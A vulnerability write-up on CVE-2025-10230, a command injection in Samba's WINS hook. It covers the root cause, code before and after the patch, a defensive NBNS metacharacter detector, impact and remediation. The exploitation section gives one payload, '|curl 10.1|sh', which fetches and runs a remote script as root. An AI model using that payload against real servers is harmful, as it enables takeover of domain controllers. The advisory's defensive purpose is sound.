Jun 3, 2026 · 6 min read
Unauthenticated remote command execution via crafted NetBIOS Name Service packets exploiting unsanitized input in Samba's WINS hook shell invocation.
A critical OS command injection vulnerability exists in Samba's Windows Internet Name Service (WINS) server implementation when configured to run as an Active Directory Domain Controller (AD DC). Unsanitized NetBIOS name data extracted from WINS registration packets is directly concatenated into a shell command invocation and executed via Samba's wins hook parameter.
Samba is an open-source implementation of the Server Message Block (SMB) networking protocol, which provides file and print services for Microsoft Windows clients. When configured as an Active Directory Domain Controller (AD DC) with Windows Internet Name Service (WINS) support enabled, Samba resolves NetBIOS names for legacy Windows clients. This system relies on NetBIOS Name Service (NBNS) packets to process registrations, queries, and releases.
CVE-2025-10230 represents an OS command injection vulnerability within the WINS server implementation of Samba. The flaw resides in the handling of the optional wins hook parameter configured in the global section of the Samba configuration file (smb.conf). This parameter specifies an external command or script that Samba executes when WINS events occur, passing the registered NetBIOS name as an argument.
An unauthenticated, remote network attacker can exploit this flaw by sending a specially crafted NBNS Name Registration Request packet to a vulnerable Samba instance on UDP port 137. By inserting shell metacharacters into the NetBIOS name field, the attacker can force the host system to execute arbitrary commands. These commands execute with the elevated privileges of the Samba daemon, which typically runs as root or system.
The root cause of CVE-2025-10230 is the improper neutralization of special elements in the NetBIOS name string prior to passing it to a system shell interpreter. When WINS support is enabled (wins support = yes), the NetBIOS Name Service (nmbd or samba process) handles registrations. If a wins hook script is configured, Samba executes it dynamically to log or process registration changes.
To invoke the script, Samba constructs a shell command line string and executes it using an internal command runner helper, typically smbrun. This helper invokes the shell (such as /bin/sh -c) to run the configured command. Samba attempts to pass the extracted NetBIOS name directly as a command-line argument to the script, but it performs this action via simple string concatenation instead of safe argument passing.
Because the NetBIOS name string is parsed directly from the incoming UDP packet, it constitutes untrusted user input. Samba fails to validate, sanitize, or escape shell metacharacters present in the name before concatenation. When the shell parses the final concatenated command line, it interprets any injected shell operators as instruction separators or subshell execution commands, leading to arbitrary command execution.
The vulnerable code path involves the extraction of the NetBIOS name from the NBNS packet structure and its direct format mapping into the hook command string. In affected versions of Samba, the name formatting operates without proper shell escaping. The snippet below highlights the structural difference between direct concatenation and sanitized execution.
```c
/* Vulnerable execution flow (Samba-internal identifiers: wins_hook is the
 * configured command, nb_name is the name parsed from the NBNS packet) */
char *cmd = NULL;
/* NetBIOS name is formatted directly into the command string without sanitization */
asprintf(&cmd, "%s %s %s %s %d", wins_hook, operation, nb_name, ip_addr, ttl);
/* smbrun executes the command string via the shell (/bin/sh -c) */
smbrun(cmd, NULL);
SAFE_FREE(cmd);
```
The security patches introduced in updated Samba versions correct this issue by applying dedicated sanitization to the NetBIOS name parameter. Escaping shell metacharacters before the command is formatted prevents the shell interpreter from treating injected operators as commands. A safer design altogether passes the name as a discrete argument to an exec-style helper that never invokes a command-line shell.
```c
/* Patched execution flow showing sanitization */
char *cmd = NULL;
char *escaped_name = shell_escape_string(nb_name);
if (escaped_name == NULL) {
	return;
}
/* The escaped name is safely formatted into the command string */
asprintf(&cmd, "%s %s %s %s %d", wins_hook, operation, escaped_name, ip_addr, ttl);
smbrun(cmd, NULL);
SAFE_FREE(cmd);
SAFE_FREE(escaped_name);
```
Exploitation of CVE-2025-10230 is constrained by the design limits of the NetBIOS protocol and Samba's input parsing. A standard NetBIOS name is strictly limited to 15 characters of user-defined data. This small payload window requires attackers to use concise payloads to achieve remote command execution or to leverage multi-stage execution techniques.
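The shell-free alternative mentioned for the patched flow above, as an added example that is not Samba's code: the hook is executed with the NetBIOS name as its own argv element, so no shell ever parses it. The hook path /bin/echo and the registration fields used below are constructed stand-ins.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Added example, not Samba code: invoke a WINS hook without a shell.
 * Every field is its own argv element, so a NetBIOS name such as
 * "PC1|id" reaches the hook verbatim as $2 and is never parsed as
 * shell syntax. The hook's stdout is captured into out[] so the caller
 * can confirm exactly which arguments the hook received. */
int run_wins_hook_noshell(const char *hook, const char *operation,
                          const char *nb_name, const char *ip_addr,
                          int ttl, char *out, size_t outlen)
{
    char ttl_str[16];
    int fds[2], status;
    pid_t pid;
    ssize_t n;
    size_t total = 0;

    snprintf(ttl_str, sizeof ttl_str, "%d", ttl);
    if (pipe(fds) != 0) return -1;
    pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {
        /* Child: stdout -> pipe, then exec the hook directly. There is
         * no "/bin/sh -c" step, so nothing interprets metacharacters. */
        char *const argv[] = { (char *)hook, (char *)operation,
                               (char *)nb_name, (char *)ip_addr,
                               ttl_str, NULL };
        close(fds[0]);
        dup2(fds[1], STDOUT_FILENO);
        close(fds[1]);
        execv(hook, argv);
        _exit(127); /* exec failed */
    }
    /* Parent: drain the hook's stdout, then collect its exit status. */
    close(fds[1]);
    while (total < outlen - 1 &&
           (n = read(fds[0], out + total, outlen - 1 - total)) > 0)
        total += (size_t)n;
    out[total] = '\0';
    close(fds[0]);
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Calling it with /bin/echo as the stand-in hook and the name PC1|id returns 0 and captures the line `add PC1|id 10.0.0.1 300`, the pipe character delivered as data rather than executed.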
Furthermore, the NetBIOS name parser within Samba blocks or rejects packets containing specific metacharacters such as <, >, and ;. Attackers must avoid these restricted characters and instead use other shell operators to chain and execute commands. Operators like pipes (|), ampersands (&), backticks (`), and subshell operators ($()) remain viable within the parsing logic.
To execute the payload, an attacker constructs a NetBIOS Name Registration Request (Opcode 0xF) packet containing the payload in the NetBIOS name field. For example, the payload |curl 10.1|sh fits within the 15-character limit. When sent to the target server on UDP port 137, Samba parses the packet, matches the multi-homed registration request, and invokes the wins hook script with the payload, prompting the server to fetch and execute an external script.
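For defenders watching UDP 137 traffic, an added example (not Samba's code) that decodes the NetBIOS name from a registration request and flags any of the shell metacharacters discussed above; the packet layout is taken from RFC 1002 and the names and packets the functions operate on are constructed.

```c
#include <stddef.h>
#include <string.h>

/* Added example, not Samba code: decode the NetBIOS name in an NBNS
 * registration request and flag shell metacharacters, the check a network
 * sensor on UDP 137 would apply. Layout assumed from RFC 1002: 12-byte
 * header, then a length byte (0x20) and 32 bytes of "first-level"
 * encoding (each nibble sent as 'A' + nibble), which decode to 15 name
 * bytes (space padded) plus a 1-byte suffix. */
#define NBNS_HDR_LEN 12
#define NBNS_ENC_LEN 32

/* Decode pkt into name[16]; 0 on success, -1 if malformed. */
int nbns_decode_name(const unsigned char *pkt, size_t len, char name[16])
{
    const unsigned char *p;
    int i;
    if (len < NBNS_HDR_LEN + 1 + NBNS_ENC_LEN || pkt[NBNS_HDR_LEN] != NBNS_ENC_LEN)
        return -1;
    p = pkt + NBNS_HDR_LEN + 1;
    for (i = 0; i < 16; i++) {
        unsigned char hi = p[2 * i], lo = p[2 * i + 1];
        if (hi < 'A' || hi > 'P' || lo < 'A' || lo > 'P') return -1;
        name[i] = (char)(((hi - 'A') << 4) | (lo - 'A'));
    }
    return 0;
}

/* First shell metacharacter in the 15-byte name, or 0 if none. Any of
 * these would be parsed as syntax once the name reaches "/bin/sh -c". */
int nbns_name_shell_metachar(const char name[16])
{
    static const char meta[] = "|&`$();<>\n";
    int i;
    for (i = 0; i < 15; i++)
        if (name[i] != '\0' && strchr(meta, name[i]) != NULL)
            return (unsigned char)name[i];
    return 0;
}

/* Inverse encoding, used only to build constructed sample packets. */
void nbns_encode_name(const char *name, unsigned char suffix, unsigned char out[32])
{
    size_t n = strlen(name), i;
    for (i = 0; i < 16; i++) {
        unsigned char c = i == 15 ? suffix : (i < n ? (unsigned char)name[i] : ' ');
        out[2 * i] = (unsigned char)('A' + (c >> 4));
        out[2 * i + 1] = (unsigned char)('A' + (c & 0x0f));
    }
}
```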
The impact of successful exploitation is critical, as represented by the CVSS score of 10.0. An unauthenticated remote attacker can execute arbitrary commands on the host operating system. Because the Samba daemon must run with high privileges to manage network sockets and domain controller assets, the injected commands execute as the root or SYSTEM user.
Compromising a Samba Active Directory Domain Controller yields total control over the domain's Identity and Access Management (IAM) infrastructure. An attacker who gains root access on a Domain Controller can extract password hashes, modify domain policies, establish persistent backdoors, and pivot to any other joined system within the directory service network.
The CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H confirms that the attack requires low complexity, no local privileges, and no user interaction. The Scope: Changed component highlights that the breach of the Samba process directly leads to the complete compromise of the underlying operating system and the associated Active Directory domain environment.
The primary and recommended remediation is to apply the official security updates released by Samba. Administrators must upgrade their installations to version 4.23.2, 4.22.5, or 4.21.9 or later. These versions incorporate security controls that escape the NetBIOS name parameter before executing external hooks.
If immediate patching is not feasible, administrators can implement effective workarounds by modifying the Samba configuration file (smb.conf). The first option is to disable legacy WINS name resolution support entirely by setting wins support = no in the global configuration section and restarting the service.
The second option is to disable the wins hook functionality if WINS resolution is still required. Commenting out or deleting the wins hook parameter from the global settings prevents Samba from invoking external shell scripts during WINS events, neutralizing the injection vector without disabling WINS itself.
| Product | Affected Versions | Fixed Version |
|---|---|---|
| Samba | < 4.21.9 | 4.21.9 |
| Samba | >= 4.22.0, < 4.22.5 | 4.22.5 |
| Samba | >= 4.23.0, < 4.23.2 | 4.23.2 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') |
| Attack Vector | Network (UDP 137) |
| CVSS Score | 10.0 |
| EPSS Score | 0.00378 |
| Impact | Unauthenticated Remote Code Execution |
| Exploit Status | Functional PoC available |
| KEV Status | Not currently listed |